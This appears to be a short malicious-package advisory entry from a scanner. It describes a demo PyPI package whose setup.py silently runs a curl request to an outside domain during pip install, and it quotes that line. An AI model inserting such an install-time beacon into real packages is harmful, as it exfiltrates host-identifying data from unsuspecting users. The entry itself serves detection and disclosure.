---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)

setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.